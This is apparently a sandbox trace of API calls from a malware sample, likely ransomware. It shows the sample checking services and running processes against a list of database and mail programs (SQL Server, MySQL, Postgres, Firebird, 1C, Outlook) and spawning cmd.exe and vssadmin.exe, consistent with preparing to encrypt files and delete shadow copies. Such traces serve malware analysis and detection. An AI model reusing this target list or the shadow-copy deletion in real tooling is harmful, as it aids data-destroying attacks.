	[0050.795] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0050.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0050.795] lstrlenW (lpString="TrkWks") returned 6
	[0050.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0050.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0050.795] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0050.795] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0050.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0050.795] lstrlenW (lpString="UxSms") returned 5
	[0050.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0050.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0050.795] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0050.795] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0050.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0050.795] lstrlenW (lpString="VSS") returned 3
	[0050.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0050.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0050.795] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0050.795] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0050.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0050.795] lstrlenW (lpString="WdiServiceHost") returned 14
	[0050.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0050.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0050.795] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0050.795] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0050.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0050.796] lstrlenW (lpString="WdiSystemHost") returned 13
	[0050.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0050.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0050.796] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0050.796] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0050.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0050.796] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0050.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0050.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0050.796] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0050.796] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0050.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0050.796] lstrlenW (lpString="Winmgmt") returned 7
	[0050.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0050.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0050.796] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0050.796] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0050.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0050.796] lstrlenW (lpString="WPDBusEnum") returned 10
	[0050.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0050.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0050.796] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0050.796] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0050.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0050.796] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4b70c0 | out: hHeap=0x7d60000) returned 1
	[0050.796] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x184
	[0050.798] Process32FirstW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0050.799] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0050.799] lstrlenW (lpString="System") returned 6
	[0050.799] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0050.799] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0050.799] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0050.799] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0050.799] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0050.799] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0050.799] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0050.799] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0050.800] lstrlenW (lpString="smss.exe") returned 8
	[0050.800] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0050.800] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0050.800] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0050.800] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0050.800] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0050.800] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0050.800] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0050.800] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0050.800] lstrlenW (lpString="csrss.exe") returned 9
	[0050.800] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0050.800] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0050.800] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0050.801] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0050.801] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0050.801] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0050.801] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0050.801] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0050.801] lstrlenW (lpString="wininit.exe") returned 11
	[0050.801] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0050.801] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0050.801] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0050.801] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0050.802] lstrlenW (lpString="csrss.exe") returned 9
	[0050.802] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0050.802] lstrlenW (lpString="winlogon.exe") returned 12
	[0050.802] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0050.803] lstrlenW (lpString="services.exe") returned 12
	[0050.803] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0050.803] lstrlenW (lpString="lsass.exe") returned 9
	[0050.803] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0050.804] lstrlenW (lpString="lsm.exe") returned 7
	[0050.804] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.804] lstrlenW (lpString="svchost.exe") returned 11
	[0050.804] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.805] lstrlenW (lpString="svchost.exe") returned 11
	[0050.805] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.805] lstrlenW (lpString="svchost.exe") returned 11
	[0050.805] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.806] lstrlenW (lpString="svchost.exe") returned 11
	[0050.806] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.806] lstrlenW (lpString="svchost.exe") returned 11
	[0050.806] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0050.806] lstrlenW (lpString="audiodg.exe") returned 11
	[0050.807] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.807] lstrlenW (lpString="svchost.exe") returned 11
	[0050.807] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.807] lstrlenW (lpString="svchost.exe") returned 11
	[0050.807] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0050.808] lstrlenW (lpString="dwm.exe") returned 7
	[0050.808] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0050.808] lstrlenW (lpString="explorer.exe") returned 12
	[0050.808] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0050.809] lstrlenW (lpString="spoolsv.exe") returned 11
	[0050.809] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0050.809] lstrlenW (lpString="taskhost.exe") returned 12
	[0050.809] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.810] lstrlenW (lpString="svchost.exe") returned 11
	[0050.810] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0050.810] lstrlenW (lpString="taskeng.exe") returned 11
	[0050.810] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0050.811] lstrlenW (lpString="taskhost.exe") returned 12
	[0050.811] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0050.811] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0050.811] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0050.812] lstrlenW (lpString="python tragedy.exe") returned 18
	[0050.812] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0050.812] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0050.812] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0050.813] lstrlenW (lpString="computers.exe") returned 13
	[0050.813] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0050.813] lstrlenW (lpString="separated.exe") returned 13
	[0050.813] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0050.814] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0050.814] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0050.814] lstrlenW (lpString="darkness.exe") returned 12
	[0050.814] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0050.814] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0050.815] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0050.815] lstrlenW (lpString="sophisticated.exe") returned 17
	[0050.815] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0050.815] lstrlenW (lpString="wishlist.exe") returned 12
	[0050.815] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0050.823] lstrlenW (lpString="top.exe") returned 7
	[0050.823] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0050.823] lstrlenW (lpString="implemented.exe") returned 15
	[0050.823] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0050.824] lstrlenW (lpString="comp.exe") returned 8
	[0050.824] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0050.824] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0050.824] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0050.825] lstrlenW (lpString="solved.exe") returned 10
	[0050.825] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0050.825] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0050.825] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0050.826] lstrlenW (lpString="trips.exe") returned 9
	[0050.826] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0050.826] lstrlenW (lpString="tumormanual.exe") returned 15
	[0050.826] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0050.827] lstrlenW (lpString="telecom.exe") returned 11
	[0050.827] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0050.827] lstrlenW (lpString="realistic.exe") returned 13
	[0050.827] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0050.828] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0050.828] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0050.828] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0050.828] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0050.828] lstrlenW (lpString="cmd.exe") returned 7
	[0050.829] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0050.829] lstrlenW (lpString="conhost.exe") returned 11
	[0050.829] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0050.829] lstrlenW (lpString="vssadmin.exe") returned 12
	[0050.829] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0050.830] lstrlenW (lpString="VSSVC.exe") returned 9
	[0050.830] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.830] lstrlenW (lpString="svchost.exe") returned 11
	[0050.830] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0050.831] CloseHandle (hObject=0x184) returned 1
	[0050.831] Sleep (dwMilliseconds=0x1f4) 
	[0051.534] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7e0fba8
	[0051.535] EnumServicesStatusExW (in: hSCManager=0x7e0fba8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0051.535] GetLastError () returned 0xea
	[0051.535] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x12c6) returned 0xb4b70c0
